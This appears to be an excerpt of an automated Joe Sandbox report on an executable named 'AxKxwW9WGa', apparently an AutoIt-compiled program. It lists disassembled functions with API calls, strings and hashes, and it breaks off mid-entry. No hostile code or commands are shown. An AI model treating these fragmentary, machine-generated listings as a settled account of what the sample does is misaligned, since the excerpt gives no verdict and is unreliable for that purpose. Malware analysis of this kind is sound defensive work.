Instruction ID: b2e5710f3ca9bb47f249b3572c1b45ad333d90d1239de381ec95709334c8af26
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: C7C1813220519309DF6D463AC47413FBAA15EA27B131E076FD4B3CB2E4FE28D925D625

Function 00B08B18 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1517936624.0000000000B05000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B05000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b05000_AxKxwW9WGa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 5915dbcd9faeaae6ac90bbb787751a2db621e52d8a60fed28cfa45942d64a355
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: A441E271D1051CEBCF48CFADC890AAEBBF2EF88201F548299D116AB345C730AB41DB80

Function 00B089A8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1517936624.0000000000B05000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B05000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b05000_AxKxwW9WGa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: ade970f5b91255631927990af2f405039783d62644b295e411d076e32a093eac
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 7F018078A00209EFCB44DF98C5909AEFBF5FB48310F2085DAE849A7741DB30AE41DB80

Function 00B08A08 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1517936624.0000000000B05000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B05000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b05000_AxKxwW9WGa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 33b2782b75a86b286b72c8fa4561bd7c03265b7733c3a69c9ad7341d08ef9a6a
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: C2018474A00109EFCB44DF98C5909AEFBF5FB48310F20859AE849A7745D730AE51DB80

Function 00B07358 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1517936624.0000000000B05000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B05000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b05000_AxKxwW9WGa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 004B7806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 004B785B
DeleteObject.GDI32(00000000), ref: 004B786D
DestroyWindow.USER32 ref: 004B787B
GetDesktopWindow.USER32 ref: 004B7895
GetWindowRect.USER32(00000000), ref: 004B789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 004B79DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 004B79ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004B7A35
GetClientRect.USER32(00000000,?), ref: 004B7A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004B7A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004B7A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004B7AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004B7ABB
GlobalLock.KERNEL32(00000000), ref: 004B7AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004B7AD3
GlobalUnlock.KERNEL32(00000000), ref: 004B7ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004B7AE3
GlobalFree.KERNEL32(00000000), ref: 004B7AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004B7B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,004D2CAC,00000000), ref: 004B7B16
GlobalFree.KERNEL32(00000000), ref: 004B7B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 004B7B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 004B7B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004B7B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004B7D7A

Strings

AutoIt v3, xrefs: 004B7A2D
static, xrefs: 004B7A75, 004B7BCC
DISPLAY, xrefs: 004B7BDD
, xrefs: 004B7D00

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: e5c0a673f952e6e699e87a3b856bcd51b73320fda199333e74aa9bbab1d4f37c
Instruction ID: 1675c46ba386c9f067737d8daa1757cd13829f50cbfb8aaf8522ef530f6cbced
Opcode Fuzzy Hash: e5c0a673f952e6e699e87a3b856bcd51b73320fda199333e74aa9bbab1d4f37c
Instruction Fuzzy Hash: 63027B75900105AFDB14DFA4CC89EAF7BB9FF48310F108169F905AB2A1CB38AD05CB68

Function 004C356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,004CF910), ref: 004C3627
IsWindowVisible.USER32(?), ref: 004C364B

Strings

DELSTRING, xrefs: 004C3749
SETCURRENTSELECTION, xrefs: 004C37B6
GETSELECTED, xrefs: 004C38A3
SELECTSTRING, xrefs: 004C3806
TABLEFT, xrefs: 004C3687
SHOWDROPDOWN, xrefs: 004C36E0
GETLINE, xrefs: 004C399B
TABRIGHT, xrefs: 004C369D
UNCHECK, xrefs: 004C3883
ADDSTRING, xrefs: 004C3716
GETLINECOUNT, xrefs: 004C38C6
ISVISIBLE, xrefs: 004C3637
ISENABLED, xrefs: 004C366B
SENDCOMMANDID, xrefs: 004C39DA
HIDEDROPDOWN, xrefs: 004C3700
GETCURRENTLINE, xrefs: 004C38ED
CURRENTTAB, xrefs: 004C36BD
FINDSTRING, xrefs: 004C3776
GETCURRENTSELECTION, xrefs: 004C37E3
EDITPASTE, xrefs: 004C395F
CHECK, xrefs: 004C386D
ISCHECKED, xrefs: 004C3839
GETCURRENTCOL, xrefs: 004C3928

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 0f455df381ecaedbe2eb3a2cc2fe918f1cef8d3397cf89a959bc0792da7fbd67
Instruction ID: bb52dda362a091eb34340a6d86f871a22cf00471248d6ede4317190ffc47bba7
Opcode Fuzzy Hash: 0f455df381ecaedbe2eb3a2cc2fe918f1cef8d3397cf89a959bc0792da7fbd67
Instruction Fuzzy Hash: B8D181742043019BCB54EF15C451F6F7B91AF95388F04846EF8825B3A2DB39EE0ADB4A

Function 004CA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 004CA630
GetSysColorBrush.USER32(0000000F), ref: 004CA661
GetSysColor.USER32(0000000F), ref: 004CA66D
SetBkColor.GDI32(?,000000FF), ref: 004CA687
SelectObject.GDI32(?,00000000), ref: 004CA696
InflateRect.USER32(?,000000FF,000000FF), ref: 004CA6C1
GetSysColor.USER32(00000010), ref: 004CA6C9
CreateSolidBrush.GDI32(00000000), ref: 004CA6D0
FrameRect.USER32(?,?,00000000), ref: 004CA6DF
DeleteObject.GDI32(00000000), ref: 004CA6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 004CA731
FillRect.USER32(?,?,00000000), ref: 004CA763
GetWindowLongW.USER32(?,000000F0), ref: 004CA78E

Part of subcall function 004CA8CA: GetSysColor.USER32(00000012), ref: 004CA903
Part of subcall function 004CA8CA: SetTextColor.GDI32(?,?), ref: 004CA907
Part of subcall function 004CA8CA: GetSysColorBrush.USER32(0000000F), ref: 004CA91D
Part of subcall function 004CA8CA: GetSysColor.USER32(0000000F), ref: 004CA928
Part of subcall function 004CA8CA: GetSysColor.USER32(00000011), ref: 004CA945
Part of subcall function 004CA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 004CA953
Part of subcall function 004CA8CA: SelectObject.GDI32(?,00000000), ref: 004CA964
Part of subcall function 004CA8CA: SetBkColor.GDI32(?,00000000), ref: 004CA96D
Part of subcall function 004CA8CA: SelectObject.GDI32(?,?), ref: 004CA97A
Part of subcall function 004CA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 004CA999
Part of subcall function 004CA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004CA9B0
Part of subcall function 004CA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 004CA9C5
Part of subcall function 004CA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004CA9ED

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: df59060d10ebf025bb1d5ae1b89eaea80271c71cec7ca69441a4dc92eda96226
Instruction ID: ea2a0a1d76fdbdb4bedee6706a08e5d91a99bb9382f04fd019b074f1ef538ac1
Opcode Fuzzy Hash: df59060d10ebf025bb1d5ae1b89eaea80271c71cec7ca69441a4dc92eda96226
Instruction Fuzzy Hash: 48919F71009305BFC7909F64DC08E6B7BAAFF48325F140A2EF5A2961A1D738D849CB5A

Function 00442C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00442CA2
DeleteObject.GDI32(00000000), ref: 00442CE8
DeleteObject.GDI32(00000000), ref: 00442CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00442CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00442D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0047C43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0047C474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0047C89D

Part of subcall function 00441B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00442036,?,00000000,?,?,?,?,004416CB,00000000,?), ref: 00441B9A

SendMessageW.USER32(?,00001053), ref: 0047C8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0047C8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0047C907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0047C912

Strings

0, xrefs: 0047C731

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 2a076f3d1086368490c0b5afbdd3f62011e4074109ab20ffbcdad885eff87d7b
Instruction ID: 745e3cc9aeeaaec6c8a78d3669619b9223b74feaa0a93b28297f950dafb2ed36
Opcode Fuzzy Hash: 2a076f3d1086368490c0b5afbdd3f62011e4074109ab20ffbcdad885eff87d7b
Instruction Fuzzy Hash: 66129D30600211EFDB24CF24C9C4BAAB7E5BF44304F54856EF599DB262CB79E846CB99

Function 004B74AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 004B74DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004B759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004B75DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004B75ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 004B7633
GetClientRect.USER32(00000000,?), ref: 004B763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 004B7683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004B7692
GetStockObject.GDI32(00000011), ref: 004B76A2
SelectObject.GDI32(00000000,00000000), ref: 004B76A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004B76B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004B76BF
DeleteDC.GDI32(00000000), ref: 004B76C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004B76F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 004B770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 004B7746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 004B775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 004B776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 004B779B
GetStockObject.GDI32(00000011), ref: 004B77A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004B77B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004B77BB

Strings

AutoIt v3, xrefs: 004B762B
msctls_progress32, xrefs: 004B773C
static, xrefs: 004B767D, 004B7795
DISPLAY, xrefs: 004B7688

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 8dd0d4fc1f92fc360e3fb3ea13c27e1094635520bf0627aa053539efbbb570e6
Instruction ID: a7f5e8f878a277da41c0891072c9fb9c73e02dab03ee38da386ab64032285499
Opcode Fuzzy Hash: 8dd0d4fc1f92fc360e3fb3ea13c27e1094635520bf0627aa053539efbbb570e6
Instruction Fuzzy Hash: 15A19175A00205BFEB14DBA4DC4AFAF7BAAEF45710F004115FA14A72E0DB74AD04CB68

Function 004AAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 004AAD1E
GetDriveTypeW.KERNEL32(?,004CFAC0,?,\\.\,004CF910), ref: 004AADFB
SetErrorMode.KERNEL32(00000000,004CFAC0,?,\\.\,004CF910), ref: 004AAF59

Strings

SCSI, xrefs: 004AAEC6
FileBackedVirtual, xrefs: 004AAF28
Fibre, xrefs: 004AAEE9
RAMDisk, xrefs: 004AAE25
Removable, xrefs: 004AAE4D
Unknown, xrefs: 004AAE1B, 004AAEBF
Fixed, xrefs: 004AAE43
iSCSI, xrefs: 004AAEFE
RAID, xrefs: 004AAEF7
SSD, xrefs: 004AAE86
1394, xrefs: 004AAEDB
ATA, xrefs: 004AAED4
SSA, xrefs: 004AAEE2
CDROM, xrefs: 004AAE2F
SAS, xrefs: 004AAF05
SATA, xrefs: 004AAF0C
PhysicalDrive, xrefs: 004AADA7
ATAPI, xrefs: 004AAECD
MMC, xrefs: 004AAF1A
Virtual, xrefs: 004AAF21
Network, xrefs: 004AAE39
USB, xrefs: 004AAEF0
\\.\, xrefs: 004AAD70

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 4510b7509fc170aca5e3140847e112c39b8d6aec82d5a6524629783fa4b4e5c2
Instruction ID: 43f27e461ce28a054efa6671195fce6aa7a9f15b24dd6936b83b03f1683bb887
Opcode Fuzzy Hash: 4510b7509fc170aca5e3140847e112c39b8d6aec82d5a6524629783fa4b4e5c2
Instruction Fuzzy Hash: 855173B06442099F8B14DB11C942DBE7361EB6A708730405FF506AF291DB3DAD26EB5F

Function 004468DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00446931
__wcsnicmp.LIBCMT ref: 00446949
__wcsnicmp.LIBCMT ref: 00446961
__wcsnicmp.LIBCMT ref: 00446979
__wcsnicmp.LIBCMT ref: 00446991
__wcsnicmp.LIBCMT ref: 004469A9
__wcsnicmp.LIBCMT ref: 004469C1
__wcsnicmp.LIBCMT ref: 004469D5
__wcsnicmp.LIBCMT ref: 00446A16
__wcsnicmp.LIBCMT ref: 00446A2A
__wcsnicmp.LIBCMT ref: 00446A3E
__wcsnicmp.LIBCMT ref: 00446A52

Strings

#ce, xrefs: 00446A4C
#OnAutoItStartRegister, xrefs: 00446973
#comments-end, xrefs: 00446A38
#notrayicon, xrefs: 00446943
#comments-start, xrefs: 004469BB, 00446A10
#cs, xrefs: 004469CF, 00446A24
#requireadmin, xrefs: 0044695B
Bad directive syntax error, xrefs: 0047E31A
Unterminated group of comments, xrefs: 0047E403
#include-once, xrefs: 0044698B
Cannot parse #include, xrefs: 0047E3F0
#pragma compile, xrefs: 0044692B
#include, xrefs: 004469A3

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 816d93a102db375090692cd799723c81e3e9793721f7a620e0d2d1379889d487
Instruction ID: fa4e3e5e9ee167a08262f169b7feecc5261bac73f0bd32c68089a46e45019325
Opcode Fuzzy Hash: 816d93a102db375090692cd799723c81e3e9793721f7a620e0d2d1379889d487
Instruction Fuzzy Hash: 458108B06006056AEB10AA62DC42FAB3768EF16705F14812BFD056A292FB7DDD05C66F

Function 004C9A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 004C9AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004C9B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 004C9BA7

Strings

0, xrefs: 004C9BE4

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: 4f603dfcbe226cd6ba491e4355435849d052e3156ec8be82f5a49d0a665146a9
Instruction ID: 49e1a4436f4fac9481e4710bfb6fe0bc9cd904f7f7933964881a60ec08209f26
Opcode Fuzzy Hash: 4f603dfcbe226cd6ba491e4355435849d052e3156ec8be82f5a49d0a665146a9
Instruction Fuzzy Hash: DA02BC38204201BBE7A5CF24C848FABBBE5FF45314F04852EF999962A1C739DD45CB5A

Function 004CA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 004CA903
SetTextColor.GDI32(?,?), ref: 004CA907
GetSysColorBrush.USER32(0000000F), ref: 004CA91D
GetSysColor.USER32(0000000F), ref: 004CA928
CreateSolidBrush.GDI32(?), ref: 004CA92D
GetSysColor.USER32(00000011), ref: 004CA945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 004CA953
SelectObject.GDI32(?,00000000), ref: 004CA964
SetBkColor.GDI32(?,00000000), ref: 004CA96D
SelectObject.GDI32(?,?), ref: 004CA97A
InflateRect.USER32(?,000000FF,000000FF), ref: 004CA999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004CA9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 004CA9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004CA9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 004CAA14
InflateRect.USER32(?,000000FD,000000FD), ref: 004CAA32
DrawFocusRect.USER32(?,?), ref: 004CAA3D
GetSysColor.USER32(00000011), ref: 004CAA4B
SetTextColor.GDI32(?,00000000), ref: 004CAA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004CAA67
SelectObject.GDI32(?,004CA5FA), ref: 004CAA7E
DeleteObject.GDI32(?), ref: 004CAA89
SelectObject.GDI32(?,?), ref: 004CAA8F
DeleteObject.GDI32(?), ref: 004CAA94
SetTextColor.GDI32(?,?), ref: 004CAA9A
SetBkColor.GDI32(?,?), ref: 004CAAA4

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 28cd11ad28d6dbbbf8fcbbfb3221b2e8ee0667a7fecc7efe8c316b272f469c5f
Instruction ID: 710aac5d3d40ee31790af5aaea7c290698566f09e67392b931e7a819499621f1
Opcode Fuzzy Hash: 28cd11ad28d6dbbbf8fcbbfb3221b2e8ee0667a7fecc7efe8c316b272f469c5f
Instruction Fuzzy Hash: 67516C71900208FFDB509FA4DC49EAE7BBAEF08320F154626F911AB2A1D7799D44CF94

Function 004C89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

